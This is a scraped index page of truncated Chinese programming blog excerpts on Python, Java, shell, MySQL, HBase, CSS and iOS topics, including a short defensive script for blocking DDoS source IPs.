  • ERROR: No matching distribution found for tf-estimator-nightly==2.8.0.dev2021122109 小九在学习 python开发语言
    ERROR:Ignoredthefollowingversionsthatrequireadifferentpythonversion:1.14.0Requires-Python>=3.10;1.14.0rc1Requires-Python>=3.10;1.14.0rc2Requires-Python>=3.10ERROR:Couldnotfindaversionthatsatisfiesther
  • PyArmor:一个超级厉害的 Python 库! 一只蜗牛儿 python开发语言
    在Python的世界里,如何保护我们的代码不被轻易盗用或者破解,一直是开发者们关注的问题。尤其是在发布软件时,如何有效防止源代码泄漏或者被逆向工程分析,成为了一个重要课题。PyArmor作为一款强大的Python加密工具,能够帮助开发者对Python源代码进行加密保护,防止非法复制和破解。本文将全面介绍PyArmor,并通过代码示例展示如何使用它对Python脚本进行加密、打包和保护。1.PyAr
  • 多线程编程之存钱与取钱 周凡杨 javathread多线程存钱取钱
      生活费问题是这样的:学生每月都需要生活费,家长一次预存一段时间的生活费,家长和学生使用统一的一个帐号,在学生每次取帐号中一部分钱,直到帐号中没钱时 通知家长存钱,而家长看到帐户还有钱则不存钱,直到帐户没钱时才存钱。   问题分析:首先问题中有三个实体,学生、家长、银行账户,所以设计程序时就要设计三个类。其中银行账户只有一个,学生和家长操作的是同一个银行账户,学生的行为是
  • java中数组与List相互转换的方法 征客丶 JavaScriptjavajsonp
    1.List转换成为数组。(这里的List是实体是ArrayList)   调用ArrayList的toArray方法。   toArray   public T[] toArray(T[] a)返回一个按照正确的顺序包含此列表中所有元素的数组;返回数组的运行时类型就是指定数组的运行时类型。如果列表能放入指定的数组,则返回放入此列表元素的数组。否则,将根据指定数组的运行时类型和此列表的大小分
  • Shell 流程控制 daizj 流程控制if elsewhilecaseshell
    Shell 流程控制 和Java、PHP等语言不一样,sh的流程控制不可为空,如(以下为PHP流程控制写法): <?php if(isset($_GET["q"])){ search(q);}else{// 不做任何事情} 在sh/bash里可不能这么写,如果else分支没有语句执行,就不要写这个else,就像这样 if else if if 语句语
  • Linux服务器新手操作之二 周凡杨 Linux 简单 操作
    1.利用关键字搜寻Man Pages    man -k keyword  其中-k 是选项,keyword是要搜寻的关键字 如果现在想使用whoami命令,但是只记住了前3个字符who,就可以使用 man -k who来搜寻关键字who的man命令       [haself@HA5-DZ26 ~]$ man -k
  • socket聊天室之服务器搭建 朱辉辉33 socket
    因为我们做的是聊天室,所以会有多个客户端,每个客户端我们用一个线程去实现,通过搭建一个服务器来实现从每个客户端来读取信息和发送信息。    我们先写客户端的线程。 public class ChatSocket extends Thread{ Socket socket; public ChatSocket(Socket socket){ this.sock
  • 利用finereport建设保险公司决策分析系统的思路和方法 老A不折腾 finereport金融保险分析系统报表系统项目开发
    决策分析系统呈现的是数据页面,也就是俗称的报表,报表与报表间、数据与数据间都按照一定的逻辑设定,是业务人员查看、分析数据的平台,更是辅助领导们运营决策的平台。底层数据决定上层分析,所以建设决策分析系统一般包括数据层处理(数据仓库建设)。   项目背景介绍 通常,保险公司信息化程度很高,基本上都有业务处理系统(像集团业务处理系统、老业务处理系统、个人代理人系统等)、数据服务系统(通过
  • 始终要页面在ifream的最顶层 林鹤霄
    index.jsp中有ifream,但是session消失后要让login.jsp始终显示到ifream的最顶层。。。始终没搞定,后来反复琢磨之后,得到了解决办法,在这儿给大家分享下。。 index.jsp--->主要是加了颜色的那一句 <html> <iframe name="top" ></iframe> <ifram
  • MySQL binlog恢复数据 aigo mysql
    1,先确保my.ini已经配置了binlog:   # binlog log_bin = D:/mysql-5.6.21-winx64/log/binlog/mysql-bin.log log_bin_index = D:/mysql-5.6.21-winx64/log/binlog/mysql-bin.index log_error = D:/mysql-5.6.21-win
  • OCX打成CBA包并实现自动安装与自动升级 alxw4616 ocxcab
    近来手上有个项目,需要使用ocx控件 (ocx是什么? http://baike.baidu.com/view/393671.htm) 在生产过程中我遇到了如下问题. 1. 如何让 ocx 自动安装?     a) 如何签名?     b) 如何打包?     c) 如何安装到指定目录? 2.
  • Hashmap队列和PriorityQueue队列的应用 百合不是茶 Hashmap队列PriorityQueue队列
      HashMap队列已经是学过了的,但是最近在用的时候不是很熟悉,刚刚重新看以一次,   HashMap是K,v键 ,值     put()添加元素      //下面试HashMap去掉重复的 package com.hashMapandPriorityQueue; import java.util.H
  • JDK1.5 returnvalue实例 bijian1013 javathreadjava多线程returnvalue
    Callable接口: 返回结果并且可能抛出异常的任务。实现者定义了一个不带任何参数的叫做 call 的方法。 Callable 接口类似于 Runnable,两者都是为那些其实例可能被另一个线程执行的类设计的。但是 Runnable 不会返回结果,并且无法抛出经过检查的异常。        ExecutorService接口方
  • angularjs指令中动态编译的方法(适用于有异步请求的情况) 内嵌指令无效 bijian1013 JavaScriptAngularJS
            在directive的link中有一个$http请求,当请求完成后根据返回的值动态做element.append('......');这个操作,能显示没问题,可问题是我动态组的HTML里面有ng-click,发现显示出来的内容根本不执行ng-click绑定的方法!     
  • 【Java范型二】Java范型详解之extend限定范型参数的类型 bit1129 extend
    在第一篇中,定义范型类时,使用如下的方式:   public class Generics<M, S, N> { //M,S,N是范型参数 }  这种方式定义的范型类有两个基本的问题:   1. 范型参数定义的实例字段,如private M m = null;由于M的类型在运行时才能确定,那么我们在类的方法中,无法使用m,这跟定义pri
  • 【HBase十三】HBase知识点总结 bit1129 hbase
    1. 数据从MemStore flush到磁盘的触发条件有哪些?    a.显式调用flush,比如flush 'mytable'    b.MemStore中的数据容量超过flush的指定容量,hbase.hregion.memstore.flush.size,默认值是64M 2. Region的构成是怎么样? 1个Region由若干个Store组成
  • 服务器被DDOS攻击防御的SHELL脚本 ronin47
    mkdir /root/bin vi /root/bin/dropip.sh #!/bin/bash/bin/netstat -na|grep ESTABLISHED|awk ‘{print $5}’|awk -F:‘{print $1}’|sort|uniq -c|sort -rn|head -10|grep -v -E ’192.168|127.0′|awk ‘{if($2!=null&a
  • java程序员生存手册-craps 游戏-一个简单的游戏 bylijinnan java
    import java.util.Random; public class CrapsGame { /** * *一个简单的赌*博游戏,游戏规则如下: *玩家掷两个骰子,点数为1到6,如果第一次点数和为7或11,则玩家胜, *如果点数和为2、3或12,则玩家输, *如果和为其它点数,则记录第一次的点数和,然后继续掷骰,直至点数和等于第一次掷出的点
  • TOMCAT启动提示NB: JAVA_HOME should point to a JDK not a JRE解决 开窍的石头 JAVA_HOME
    当tomcat是解压的时候,用eclipse启动正常,点击startup.bat的时候启动报错; 报错如下:   The JAVA_HOME environment variable is not defined correctly This environment variable is needed to run this program NB: JAVA_HOME shou
  • [操作系统内核]操作系统与互联网 comsci 操作系统
         我首先申明:我这里所说的问题并不是针对哪个厂商的,仅仅是描述我对操作系统技术的一些看法       操作系统是一种与硬件层关系非常密切的系统软件,按理说,这种系统软件应该是由设计CPU和硬件板卡的厂商开发的,和软件公司没有直接的关系,也就是说,操作系统应该由做硬件的厂商来设计和开发
  • 富文本框ckeditor_4.4.7 文本框的简单使用 支持IE11 cuityang 富文本框
    <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>知识库内容编辑</tit
  • Property null not found darrenzhu datagridFlexAdvancedpropery null
    When you got error message like "Property null not found ***", try to fix it by the following way: 1)if you are using AdvancedDatagrid, make sure you only update the data in the data prov
  • MySQl数据库字符串替换函数使用 dcj3sjt126com mysql函数替换
    需求:需要将数据表中一个字段的值里面的所有的  .   替换成  _   原来的数据是  site.title  site.keywords  .... 替换后要为     site_title  site_keywords   使用的SQL语句如下:   updat
  • mac上终端起动MySQL的方法 dcj3sjt126com mysqlmac
    首先去官网下载: http://www.mysql.com/downloads/ 我下载了5.6.11的dmg然后安装,安装完成之后..如果要用终端去玩SQL.那么一开始要输入很长的:/usr/local/mysql/bin/mysql 这不方便啊,好想像windows下的cmd里面一样输入mysql -uroot -p1这样...上网查了下..可以实现滴. 打开终端,输入: 1
  • Gson使用一(Gson) eksliang jsongson
    转载请出自出处:http://eksliang.iteye.com/blog/2175401 一.概述 从结构上看Json,所有的数据(data)最终都可以分解成三种类型: 第一种类型是标量(scalar),也就是一个单独的字符串(string)或数字(numbers),比如"ickes"这个字符串。 第二种类型是序列(sequence),又叫做数组(array)
  • android点滴4 gundumw100 android
    Android 47个小知识 http://www.open-open.com/lib/view/open1422676091314.html Android实用代码七段(一) http://www.cnblogs.com/over140/archive/2012/09/26/2611999.html http://www.cnblogs.com/over140/arch
  • JavaWeb之JSP基本语法 ihuning javaweb
      目录   JSP模版元素  JSP表达式  JSP脚本片断  EL表达式  JSP注释  特殊字符序列的转义处理  如何查找JSP页面中的错误   JSP模版元素    JSP页面中的静态HTML内容称之为JSP模版元素,在静态的HTML内容之中可以嵌套JSP
  • App Extension编程指南(iOS8/OS X v10.10)中文版 啸笑天 ext
             当iOS 8.0和OS X v10.10发布后,一个全新的概念出现在我们眼前,那就是应用扩展。顾名思义,应用扩展允许开发者扩展应用的自定义功能和内容,能够让用户在使用其他app时使用该项功能。你可以开发一个应用扩展来执行某些特定的任务,用户使用该扩展后就可以在多个上下文环境中执行该任务。比如说,你提供了一个能让用户把内容分
  • SQLServer实现无限级树结构 macroli oraclesqlSQL Server
    表结构如下: 数据库id path titlesort 排序 1 0 首页 0 2 0,1 新闻 1 3 0,2 JAVA 2 4 0,3 JSP 3 5 0,2,3 业界动态 2 6 0,2,3 国内新闻 1 创建一个存储过程来实现,如果要在页面上使用可以设置一个返回变量将至传过去   create procedure test as begin decla
  • Css居中div,Css居中img,Css居中文本,Css垂直居中div qiaolevip 众观千象学习永无止境每天进步一点点css
    /**********Css居中Div**********/ div.center { width: 100px; margin: 0 auto; } /**********Css居中img**********/ img.center { display: block; margin-left: auto; margin-right: auto; }
  • Oracle 常用操作(实用) 吃猫的鱼 oracle
    SQL>select text from all_source where owner=user and name=upper('&plsql_name');  SQL>select * from user_ind_columns where index_name=upper('&index_name');  将表记录恢复到指定时间段以前
  • iOS中使用RSA对数据进行加密解密 witcheryne iosrsaiPhoneobjective c
      RSA算法是一种非对称加密算法,常被用于加密数据传输.如果配合上数字摘要算法, 也可以用于文件签名. 本文将讨论如何在iOS中使用RSA传输加密数据. 本文环境 mac os  openssl-1.0.1j, openssl需要使用1.x版本, 推荐使用[homebrew](http://brew.sh/)安装. Java 8 RSA基本原理 RS
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他